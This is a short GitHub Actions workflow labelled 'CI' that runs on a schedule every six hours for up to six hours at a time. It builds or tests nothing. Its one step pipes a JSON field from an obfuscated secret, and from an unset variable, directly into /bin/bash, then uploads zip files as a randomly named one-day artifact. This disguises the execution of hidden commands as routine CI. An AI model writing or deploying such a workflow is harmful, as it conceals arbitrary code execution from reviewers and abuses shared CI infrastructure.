name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '40 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          ktf94251: ${{ secrets.ktf94251 }}
        run: |
          printf '%s' "$ktf94251" | jq -r .c53573 | /bin/bash
          echo $l58 | jq -r .evny35 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: VARFngck
          path: "*.zip"
          retention-days: 1
